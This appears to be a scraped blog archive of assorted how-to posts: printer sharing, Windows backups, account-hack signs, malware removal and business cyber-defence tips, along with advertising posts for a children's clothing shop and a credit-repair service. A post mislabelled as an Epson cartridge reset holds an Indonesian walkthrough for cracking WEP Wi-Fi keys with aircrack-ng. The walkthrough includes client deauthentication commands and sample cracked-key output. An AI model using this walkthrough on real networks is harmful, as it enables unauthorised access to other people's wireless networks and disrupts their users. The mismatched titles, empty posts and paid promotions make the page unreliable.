Friday, March 10, 2017
How to Hard Reset Your iPad Quick Tips 0
How to Hard Reset Your iPad Quick Tips 0
Thursday, February 9, 2017
How to share your printer
How to share your printer
- Open Printers and Faxes.
- Right-click the printer you want to share, and then click Sharing.
- The options you see on the Sharing tab differ depending on whether sharing is enabled on your computer. For instructions on what to do next, click the option that describes what you see on the Sharing tab. I see text stating that printer sharing must be turned on
- You need to enable printer sharing by running the Network Setup Wizard. Start it by clicking the link on the Sharing tab, and then follow the instructions. Once sharing is enabled, begin this procedure again.
I see options for sharing or not sharing the printer- On the Sharing tab, click Share this printer, and then, in the Share name box, type a name for the shared printer.
- If you share the printer with users on different hardware or different operating systems, click Additional Drivers. Click the environment and operating system for the other computers, and then click OK to install the additional drivers. Drivers for users running other versions of Windows (Windows 95, Windows 98, or Windows NT 4.0) are located on the Support CD. Printer drivers for Windows NT 3.1 and Windows NT 3.5 are not included.
- Click OK, or, if you have installed additional drivers, click Close.
- To open Printers and Faxes, click Start, point to Settings, click Control Panel, click Printers and Other Hardware, and then click Printers and Faxes.
- You can also share a printer in Printers and Faxes by clicking the printer you want to share, and then clicking Share this printer under Tasks in the left pane. This option is available only if folders are set to look like a Web page and a printer is selected. For more information, click Related Topics.
- Printers are not shared by default when you install them on Windows XP Professional, but you can choose to share any printer you install on your computer.
- When you publish a printer in Active Directory, other users logged onto the Windows domain will be able to search for the printer based on its location and features such as how many pages it prints per minute and whether color printing is supported.
Available link for download
Thursday, February 2, 2017
Focus on Your strengths Mario Teguh Daily
Focus on Your strengths Mario Teguh Daily
Do not focus on your weaknesses, because doing so will weaken and sadden you.
Mario Teguh
adapted from :https://www.facebook.com/pages/Mario-Teguh-Daily/214430138660502
Available link for download
How to Prepare Your Business for a Cyber Attack
How to Prepare Your Business for a Cyber Attack
Here are some steps you can take to protect your business from such an attack:
Encrypt All Valuable Data and Automate Security:
Encryption is basic good practice for all businesses handling peoples personal information such as bank account numbers, credit card details and other personal data. Yet many businesses fail to routinely do this, even though its a technology that can be implemented at a relatively low cost. As Iain Lobban, the head of GCHQ recently said, Instilling a more security conscious culture throughout your organisation, using the practical approach in the Cyber Security Guidance will make the bad guys job harder and wont cost a fortune.
When it comes to security, manual processes arent sufficient enough to protect your IT system against powerful attacks. Automated systems are less labour intensive and more effective as security devices. You will save your security teams valuable hours if you use tools that can intelligently locate, and automatically alert, only in the occurrence of a real security threat. Also, keeping up-to-date with the latest automatic security technologies lessens the chance of falling victim to the latest malicious cyber predators.
Educate Your Employees:
Employees are vulnerable to cyber-crime. Educating your employees so that they understand the techniques used by cyber-criminals, such as phishing, malware and the misuse of credentials, is of vital importance. Keep workers highly trained on the current cyber threats. They need to know how to recognise a threat, how to deal with it, and how to contain it. If these measures are carried out, the likelihood of malicious attacks being successfully carried out can be greatly reduced.
Use Continuously Monitoring Technologies:
The latest threats are increasingly clever, and are able to disguise themselves as harmless files, slip through defences unnoticed, lie there undisturbed, and later carry out damaging activity. To combat this, you need to use technologies that constantly and continuously monitor all files, including those that appear safe. This will allow you to apply security at a later date to hazardous files that were previously thought to be harmless.
Have an Incident Response Process in Place:
Be prepared. Quick action in the event of an attack could make a real difference to the amount of damage done to your business. Containing a breach of security is very important, and to do this, it is necessary to have a co-ordinated incident response team in place. Even smaller businesses should have a designated person, who is aware of the correct procedures to follow should there be a breach of security. Good practice involves properly documented policies and procedures; for example, companies should provide a step-by-step guide on what to do after a cyber-attack, and have regular reviews and updates. The Verizon 2013 Data Breach Investigations Report found that over one-fifth of organisations took months to contain the breach of security. Make sure your company isnt one of these.
Hire a Penetration Tester:
Hire a penetration tester to find out just how effective your current security defences are. A penetration tester will, as the name suggests, attempt to penetrate through your current security systems, discovering where your weaknesses are. Money well spent if it means the potential pathway of a future attacker can be blocked.
Companies must face the fact that security breaches can and will happen. The best preparations are holistic in that they involve the latest technologies, the appropriate processes, and the people using them. Cyber-crime can be fought, but the threat of the enemy must first be acknowledged. Not doing so could cost you your business.
Available link for download
Friday, January 27, 2017
How To Use FaceBook To Promote Your Business And Make Money
How To Use FaceBook To Promote Your Business And Make Money
Available link for download
Tuesday, January 24, 2017
How to reset your Epson cartridges spoof
How to reset your Epson cartridges spoof
Aircrak-ptw adalah tool yang digunakan untuk meng-crack wireless yang diproteksi dengan WEP.Masing-masing notebook dengan spesifikasi berbeda, sehingga cara untuk menggunakan aircrack pun berbeda. Langkah-langkah untuk menggunakan aircrack-ptw untuk beberapa seri notebook adalah sebagai berikut:
ACER 4520, OS Linux Mint Elyssa
Step 1 : Setting wireless card
$ sudo airmon-ng stop ath0
kalau pake stop masih monitor mode disabled, ganti dengan .. start ath0?
kemudian masukkan
$ iwconfig
Sistem harus merespon sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)?
Step 2 : Start wireless card
$ airmon-ng start wifi0
9? adalah channel yang digunakan, chanel ini bisa dilihat melalui kismet
respon sistem harus sebagai berikut:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)?
kemudian masukkan
$ iwconfig
dan pastikan bahwa resppon sistem sebagai berikut
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID: Nickname:
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Step 3 : Jalankan airodump-ng
airodump-ng digunakan untuk mengcapture paket dari akses point
$ sudo airodump-ng channel X write prefix_for_capture_file interface
misal
$ sudo airodump-ng channel 3 write tes ath0
tes dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.
untuk mengetahui channel yang digunakan maka hilangkan channel pada command diatas
$ airodump-ng write tes ath0
Step 4 : Deauthenticate Clients(optional)
tahap ini dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client untuk men-generate ARP request.
$ sudo aireplay-ng deauth 15 -a MAC_of_AP -c MAC_client yg_diserang
misal
$ sudo aireplay-ng deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
* -a BSSID/Mac address akses point
* -c MAC Address client
* 15 jumlah paket yang dikirim
Step 5: jalankan aircrak-ptw untuk mengenerate WEP dari akses point.
$ sudo aircrack-ptw tes-01.cap
atau bisa juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng
$ sudo aircrack-ng -z tes-01.cap -b mac_ssid
misal
$ sudo aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx
contoh output :
i $ sudo aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 261446 ivs.
Aircrack-ng 1.0 beta1
[00:00:00] Tested 81 keys (got 21872 IVs)
KB depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856)
1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856)
2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112)
3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368)
4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)
KEY FOUND! [ 00:xD:EF:xx:xx ] ini adalah key atau password dari wireless network yang didapatkan
ACER 4920, OS:lINUX UBUNTU
Pada acer seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command $ sudo airmon-ng stop ath0? tetapi
$ sudo airmon-ng start wlan0
untuk langkah selanjutnya sama dengan ACER 4520
BenQ S53W,OS LINUX UBUNTU
pada seri ini wireless card yang digunakan adalah eth 1, dan bukan dengan command stop eth1? tetapi
$ airmon-ng start eth1
Selamat mencoba
Catatan : untuk mengetahui wireless yang digunakan gunakan command $ iwconfig
http://hackcenter.wordpress.com/2010/02/07/hack-wifi-dengan-aircrack-ptw/
Available link for download
Give the Best for Your Child
Give the Best for Your Child
In addition to giving affection to the child, you can give it some clothes and toys that will also train the brain growth. In addition, you can also buy your child good clothing so your child know that you love her. You can buy clothes and toys online at loulouscorner.com. This website is one of the webs that provide equipment for your child. This website has advantages not shared by other web. This website sells the goods with excellent quality that will be comfortable when used by your child. You will find jellycat and appaman products in this web. Beside that, you also find barefoot dreams products. Goods on the web are also guaranteed safe for your child; because the materials used to make these products are the choice materials.
By providing all the best for your child, your child will understand that you really love him. Children have the ability to translate any of our actions. Purchase goods or equipment online for me is more profitable because the price is cheaper than in stores. This website provides anything clothes that you need for your child.
Available link for download
Monday, January 23, 2017
Saturday, December 17, 2016
How to tell if your account was hacked
How to tell if your account was hacked
How to tell if your account was hacked
- If you have even the slightest suspicion, immediately change your password. Its always best to error on the side of caution.
- If you dont have access to your account, use the Yahoo Password Helper to get back in.
Signs that your account has been hacked
- Changes have been made to your account information.
- There are logins from locations you dont recognize in your Login Activity page.
- Your account is sending spam.
- There are messages in your sent folder that you didnt send.
- Youre receiving multiple failed delivery messages.
- You arent receiving expected emails.
Does any of this apply to you?
Review our step-by-step guide to securing your account.Available link for download
Thursday, December 15, 2016
How to Back up your files for windows 7
How to Back up your files for windows 7
Back up your files
- Click to open Backup and Restore.
- Do one of the following:
- If you have never used Windows Backup before, click Set up backup, and then follow the steps in the wizard. If you are prompted for an administrator password or confirmation, type the password or provide confirmation.
- If you have created a backup before, you can wait for your regularly scheduled backup to occur, or you can manually create a new backup by clicking Back up now. If you are prompted for an administrator password or confirmation, type the password or provide confirmation.
Notes
- We recommend that you dont back up your files to the same hard disk that Windows is installed on.
- Always store media used for backups (external hard disks, DVDs, or CDs) in a secure place to prevent unauthorized people from having access to your files; we recommend a fireproof location separate from your computer. You might also consider encrypting the data on your backup.
To create a new, full backup
- Click to open Backup and Restore.
- In the left pane, click Create new, full backup.
Note
- You will only see this option if your backup is being saved on CDs or DVDs.
To set up backup after upgrading from a previous version of Windows
- Click to open Backup and Restore.
- Click Set up backup, and then follow the steps in the wizard. If you are prompted for an administrator password or confirmation, type the password or provide confirmation.
Available link for download
Saturday, December 10, 2016
Error 5B00 How to reset your canon ip2700 and ip2772
Error 5B00 How to reset your canon ip2700 and ip2772
In this tutorial im gonna show you how to reset your canon ip2270 or ip2772.

Available link for download
Friday, October 28, 2016
Friday, October 21, 2016
Fix Your Credit Right Now!
Fix Your Credit Right Now!
Financial problems are complicated problems most often faced by the community. Credit is considered as a way to enable them to overcome their financial problems. At first it can help your, but it is not always help you. You must pay the credit that you borrow at a particular time. You need credit repair to overcome your problems. One of the webs that provide facilities that will help you to overcome bad credit is ovationcredit.com. They will help you to fix credit in a way that will not burden you.
Settlement of credit by asking for help from others to solve our financial problems can be a good way of solving credit problems. This website will help you to manage credit by arranging your financial patterns. You will be helped to find appropriate ways to deal the credit in fast time. Ive proven that they are proven to help us so well. You do not need to doubt the quality of their work and professionalisms.
Available link for download
Tuesday, October 18, 2016
How To Dribble Soccer Ball With Your Head Up
How To Dribble Soccer Ball With Your Head Up
Step 1
Step 2
Step 3
Step 4
Available link for download
Thursday, September 29, 2016
How to Remove Malware From Your Windows PC
How to Remove Malware From Your Windows PC
Step 1: Enter Safe Mode
Keep your PC disconnected from the Internet, and dont use it until youre ready to clean your PC. This can help prevent the malware from spreading and/or leaking your private data.You may find that your PC runs noticeably faster in Safe Mode. This could be a sign that your system has a malware infection, or it could mean that you have a lot of legitimate programs that normally start up alongside Windows.
Step 2: Delete Temporary Files
Now that youre in Safe Mode, youll want to run a virus scan. But before you do that, delete your temporary files. Doing this may speed up the virus scanning, free up disk space, and even get rid of some malware. To use the Disk Cleanup utility included with Windows, select Start, All Programs (or just Programs), Accessories, System Tools, Disk Cleanup.Step 3: Download Malware Scanners
Step 4: Run a Scan With Malwarebytes
Available link for download